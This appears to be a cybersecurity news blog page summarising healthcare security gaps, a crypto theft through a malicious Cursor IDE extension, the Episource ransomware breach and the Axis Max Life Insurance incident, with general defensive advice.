Healthcare Firms Face Major Threats from Risk Management and Legacy Tech, Report Finds

 

With healthcare facilities scrambling to pinpoint and address their top cyber threats, Fortified's report provides some guidance on where to begin. The report identifies five major security gaps in healthcare organisations: inadequate asset inventories, a lack of unified risk management strategies, a lack of focus on supply-chain vulnerabilities, a preference for installing new technology over maintaining legacy systems, and poor employee training.

Major cyberattacks in recent years have demonstrated how these threats are linked. Weak supply-chain oversight is an especially critical issue given the interconnected framework of the healthcare ecosystem, which includes hospitals, pharmacies, and specialty-care institutions.

The 2024 Change Healthcare hack highlighted the industry's reliance on a few obscure but ubiquitous vendors. Outdated asset inventories exacerbate these flaws, making it more difficult to repair the damage after a supply-chain attack. And these attacks frequently target the very legacy technologies that have been overlooked in favour of new products.

While securing old systems remains a persistent challenge for healthcare organisations, Fortified discovered that it was the most significant area for improvement in the previous year, followed by recovery process improvements, response planning, post-incident communications, and threat analysis maturity.

Identity management, risk assessment maturity, and leadership involvement were further areas that needed improvement. Since many attacks start with credentials that have been stolen or falsified, the latter is particularly critical. 

A spokesperson stated that Fortified's study is predicated on client interactions, including incident engagements and security ratings derived from the Cybersecurity Framework, that took place between 2023 and June 2025. Fortified serves all of its clients in North America, including major university medical centres, integrated delivery networks, and small community hospitals.
Read more »
User Security
Blockchain Developer Crypto Theft Cyber Fraud Malicious Campaign User Security

Online Criminals Steal $500K Crypto Via Malicious AI Browser Extension

 

A Russian blockchain engineer lost over $500,000 worth of cryptocurrencies in a sophisticated cyberattack, highlighting the persisting and increasing threats posed by hostile open-source packages. Even seasoned users can be duped into installing malicious software by attackers using public repositories and ranking algorithms, despite the developer community's growing knowledge and caution.

The incident was discovered in June 2025, when the victim, an experienced developer who had recently reinstalled his operating system and only employed essential, well-known applications, noticed his crypto assets had been drained, despite rigorous attention to cybersecurity. 

The researchers linked the breach to a Visual Studio Code-compatible extension called "Solidity Language" for the Cursor AI IDE, a productivity-boosting tool for smart contract developers. The extension, which was made public via the Open VSX registry, masqueraded as a legal code highlighting tool but was actually a vehicle for remote code execution. After installation, the rogue extension ran a JavaScript file called extension.js, which linked to a malicious web site to download and run PowerShell scripts. 

These scripts, in turn, installed the genuine remote management tool ScreenConnect, allowing the perpetrators to maintain remote access to the compromised PC. The attackers used this access to execute further VBScripts, which delivered additional payloads such as the Quasar open-source backdoor and a stealer module capable of syphoning credentials and wallet passphrases from browsers, email clients, and cryptocurrency wallets. 

The masquerade was effective: the malicious extension appeared near the top of search results in the extension marketplace, thanks to a ranking mechanism that prioritised recency and perceived activity over plain download counts. The attackers also plagiarised descriptions from legitimate items, thus blurring the distinction between genuine and fraudulent offerings. When the bogus extension failed to deliver the promised capabilities, the user concluded it was a glitch, allowing the malware to remain undetected. 

In an additional twist, after the malicious item was removed from the store, the threat actors swiftly uploaded a new clone called "solidity," employing advanced impersonation techniques. The malicious publisher's name differed by only one character: an uppercase "I" instead of a lowercase "l," a discrepancy that was nearly hard to detect due to font rendering. The bogus extension's download count was intentionally boosted to two million in a bid to outshine the real program, making the correct choice difficult for users.

The effort did not end there; similar attack tactics were discovered in further malicious packages on both the Open VSX registry and npm, which targeted blockchain developers via extensions and packages with recognisable names. Each infection chain followed a well-known pattern: executing PowerShell scripts, downloading further malware, and communicating with attacker-controlled command-and-control servers. This incident highlights the ongoing threat of supply-chain attacks in the open-source ecosystem.
Read more »
User Security
Data Breach Data Leak Episource United States User Security

Major Breach at Medical Billing Giant Results in The Data Leak of 5.4 Million Users

 

Episource, the medical billing behemoth, has warned millions of Americans that a hack earlier this year resulted in the theft of their private and medical data. According to a listing with the United States Department of Health and Human Services, one of the year's largest healthcare breaches affects around 5.4 million people. 

Episource, which is owned by Optum, a subsidiary of the largest health insurance company UnitedHealth Group, offers billing adjustment services to doctors, hospitals, and other healthcare-related organisations. In order to process claims through their health insurance, the company handles a lot of patients' personal and medical data.

In notices filed in California and Vermont on Friday last week, Episource stated that a criminal was able to "see and take copies" of patient and member data from its systems during the weeklong breach that ended on February 6. 

Private information stolen includes names, postal and email addresses, and phone numbers, as well as protected health data such as medical record numbers and information on doctors, diagnoses, drugs, test results, imaging, care, and other treatments. The stolen data also includes health insurance information, such as health plans, policies, and member numbers. 

Episource would not elaborate on the nature of the issue, but Sharp Healthcare, one of the organisations that worked with Episource and was impacted by the intrusion, notified its clients that the Episource hack was triggered by ransomware. This is the latest cybersecurity incident to affect UnitedHealth in recent years.

Change Healthcare, one of the top companies in the U.S. healthcare industry, which conducts billions of health transactions each year, was attacked by a ransomware gang in February 2024, resulting in the theft of personal and health information for over 190 million Americans. The cyberattack resulted in the largest healthcare data breach in US history. Several months later, UnitedHealth's Optum division exposed to the internet an internal chatbot used by staff to enquire about claims.
Read more »
User Security
Axis Max Life Insurance Data Breach Data Leak Indian Insurance User Security

Axis Max Life Cyberattack: A Warning to the Indian Insurance Sector

 

On July 2, 2025, Max Financial Services revealed a cybersecurity incident targeting its subsidiary, Axis Max Life Insurance, India's fifth-largest life insurer. This incident raises severe concerns regarding data security and threat detection in the Indian insurance sector. 

The breach was discovered by an unknown third party who notified Axis Max Life Insurance of the data access, while exact technical specifics are still pending public release. In response, the company started: 

  • Evaluation of internal security 
  • Log analysis 
  • Consulting with cybersecurity specialists for investigation and remediation 

Data leaked during the breach 

The firm accepted that some client data could have been accessed, but no specific data types or quantities were confirmed at the time of the report. Given the sensitive nature of insurance data, the exposed data could include: 

  • Personally identifiable information (PII). 
  • Financial/Insurance Policy Data Contact and health information (common for life insurers) 

This follows a recent trend of PII-focused assaults on Indian insurers (e.g., Niva Bupa, Star Health, HDFC Life), indicating an increased threat to consumer data. 

Key takeaways

Learning of a breach from an anonymous third party constitutes a serious failure in internal threat identification and monitoring. Implement real-time threat detection across endpoints, servers, and cloud platforms with SIEM, UEBA, and EDR/XDR to ensure that the organisation identifies breaches before external actors do. 

Agents, partners, and tech vendors are frequently included in insurance ecosystems, with each serving as a possible point of compromise. Extend Zero Trust principles to all third-party access, requiring tokenised, time-limited access and regular security evaluations of suppliers with data credentials. 

Mitigation tips 

  • Establish strong data inventory mapping and access logging, particularly in systems that store personally identifiable information (PII) and financial records. 
  • Have a pre-established IR crisis communication architecture that is linked with legal, regulatory, and consumer response channels that can be activated within hours. 
  • Continuous vulnerability scanning, least privilege policies, and red teaming should be used to identify exploitable holes at both the technical and human layers. 
  • Employ continuous security education, necessitate incident reporting processes, and behavioural monitoring to detect policy violations or insider abuse early.
Read more »
Subscribe to: Comments (Atom)